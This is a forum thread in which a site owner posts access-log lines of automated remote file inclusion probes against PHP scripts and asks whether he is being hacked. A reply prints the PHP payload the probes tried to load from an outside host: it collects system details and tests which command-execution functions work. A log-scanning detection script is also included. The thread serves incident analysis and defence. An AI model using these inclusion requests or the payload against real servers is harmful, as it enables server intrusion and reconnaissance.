
Am I being hacked and what are they doing?

Discussion in 'BlackHat Lounge' started by chucklechuck, Dec 25, 2008.

  1. chucklechuck

    chucklechuck Registered Member

    Joined:
    Dec 2, 2008
    Messages:
    93
    Likes Received:
    52
    Not being too up on hacking, I don't really know what this all means, but it doesn't look good. Anybody have any advice?

    Thanks in advance
    Code:
    72.55.176.232
    vm-weblinux01.axialdev.net
    Mozilla/3.0 (OS/2; U)
    December 25, 2008 12:40:46
    /golf-gift/golf-tickets//functions/anti-hack.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
    December 25, 2008 12:40:46
    /golf-gift//functions/anti-hack.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
    December 25, 2008 12:40:46
    //functions/anti-hack.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
    December 25, 2008 12:40:57
    /golf-gift/golf-tickets//ezt/common.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
    December 25, 2008 12:40:57
    //ezt/common.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
    December 25, 2008 12:40:57
    /golf-gift//ezt/common.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
  2. fatboy

    fatboy Elite Member

    Joined:
    Aug 13, 2008
    Messages:
    1,618
    Likes Received:
    3,227
    Occupation:
    Retired
    Location:
    Old Peoples Home
    At a guess, that's a script running against your server hoping that you have one of the applications it's testing for installed.

    It appears that they are trying to download idfell.txt onto your box. The file contains:

    Code:
    <?php
    //FeeLCoMz Response
    // Fingerprinting payload: collects host details and echoes them back to the scanner.
    $pwd1 =	@getcwd();
    $un = @php_uname();
    $os = @PHP_OS;
    $id1 = ex("id");if (empty($id1)) {$id1 = @get_current_user();}
    $sof1 =	@getenv("SERVER_SOFTWARE");
    $php1 =	@phpversion();
    $name1 = $_SERVER['SERVER_NAME'];
    // $SERVER_ADDR is only set when register_globals is on; otherwise this is an undefined variable.
    $ip1 = @gethostbyname($SERVER_ADDR);
    $free1=	@diskfreespace($pwd1);
    $all1= disk_total_space($pwd1);
    $used =	ConvertBytes($all1-$free1);
    $free =	ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free = 0;}
    $all = ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all = 0;}
    if (@is_writable($pwd1)) {$perm = "[W]";} else {$perm = "[R]";}
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {$sf = "ON";} else {$sf = "OFF";}
    
    echo "FeeLCoMz".$sf."<br>";
    echo "uname -a:	$un<br>";
    echo "os: $os<br>";
    echo "id: $id1<br>";
    echo "pwd: $pwd1<br>";
    echo "php: $php1<br>";
    echo "software:	$sof1<br>";
    echo "srvip: $ip1<br>";
    echo "srvname: $name1<br>";
    echo "free: $free<br>";
    echo "used: $used<br>";
    echo "total: $all $perm<br>";
    
    // Human-readable byte count, chosen by digit length rather than value.
    function ConvertBytes($number) {
      $len = strlen($number);
      if($len < 4) { return sprintf("%d b", $number); }
      if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); }
      if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); }
      return sprintf("%0.2f Gb", $number/1024/1024/1024);
    }
    
    // Tries each command-execution function in turn to see which, if any, the host allows.
    function ex($cfe) {
      $res = '';
      if (!empty($cfe)) {
        if(function_exists('exec')) {
          @exec($cfe,$res);
          $res = join("\n",$res);
        } elseif(function_exists('shell_exec')) {
          $res = @shell_exec($cfe);
        } elseif(function_exists('system')) {
          @ob_start();
          @system($cfe);
          $res = @ob_get_contents();
          @ob_end_clean();
        } elseif(function_exists('passthru')) {
          @ob_start();
          @passthru($cfe);
          $res = @ob_get_contents();
          @ob_end_clean();
        } elseif(@is_resource($f = @popen($cfe,"r"))) {
          $res = "";
          while(!@feof($f)) { $res .= @fread($f,1024); }
          @pclose($f);
        } else { $res = "NULL"; }
      }
      return $res;
    }
    
    exit;
    
    ?>
    
    which is getting various things such as the PHP version, whether safe mode is on, and whether the script can run system commands (such as exec / passthru).

    It may be a script to check what else the hacker could run if that script successfully got onto your box.

    It may be worth scanning your server to see if that file is on there anywhere.
     
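One way to pick requests like these out of an ordinary access log, added here as an illustration and not code from the thread: it flags any query parameter whose value is an absolute remote URL (the remote file inclusion pattern in the poster's entries) and records the response status, since a 200 means the probed script actually exists. The log lines are constructed in Apache combined format; the probe paths and hostnames in them are the ones reported above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Apache combined format). The two probe
# requests mirror the paths reported in the thread; the other two lines are made up.
SAMPLE_LOG = """\
72.55.176.232 - - [25/Dec/2008:12:40:46 +0000] "GET /golf-gift//functions/anti-hack.php?ezt_root_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 200 512 "-" "Mozilla/3.0 (OS/2; U)"
72.55.176.232 - - [25/Dec/2008:12:40:57 +0000] "GET //ezt/common.php?ezt_root_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 210 "-" "Mozilla/3.0 (OS/2; U)"
10.0.0.5 - - [25/Dec/2008:12:41:03 +0000] "GET /golf-gift/index.php?page=tickets HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
10.0.0.9 - - [25/Dec/2008:12:41:10 +0000] "GET /redirect.php?to=https%3A%2F%2Fexample.org%2F HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# URL schemes PHP's include()/require() will fetch when allow_url_include is enabled.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def rfi_hits(log_text):
    """Return one record per query parameter whose value is an absolute remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes values, so an encoded "https%3A%2F%2F" is caught as well.
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append({
                    "ip": m.group("ip"),
                    "status": int(m.group("status")),
                    "script": parts.path,
                    "param": key,
                    "payload_host": urlsplit(value).hostname,
                })
    return hits

def payload_hosts(hits):
    """Distinct hosts the requests tried to load code from; candidates for the block/monitor list."""
    return sorted({h["payload_host"] for h in hits})

def served_ok(hits):
    """Probes answered with 200: the targeted script exists, so that include path needs review."""
    return [h for h in hits if h["status"] == 200]

if __name__ == "__main__":
    hits = rfi_hits(SAMPLE_LOG)
    for h in hits:
        print(h)
    print("payload hosts:", payload_hosts(hits))
    print("probes that returned 200:", len(served_ok(hits)))
```

The redirect line shows the trade-off: a legitimate URL-valued parameter is flagged too, so the host list is for triage, not an automatic block.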
  3. chucklechuck

    chucklechuck Registered Member

    Joined:
    Dec 2, 2008
    Messages:
    93
    Likes Received:
    52
    Thanks for the response. I checked the stored files and can't see anything new, but this is hosted on a shared HostGator server. Will keep my eye out anyway.
     
  4. fatboy

    fatboy Elite Member

    Joined:
    Aug 13, 2008
    Messages:
    1,618
    Likes Received:
    3,227
    Occupation:
    Retired
    Location:
    Old Peoples Home
    It's probably just an automated scan that is going across the IP range you are on :)
    Let HostGator worry about the backend ;)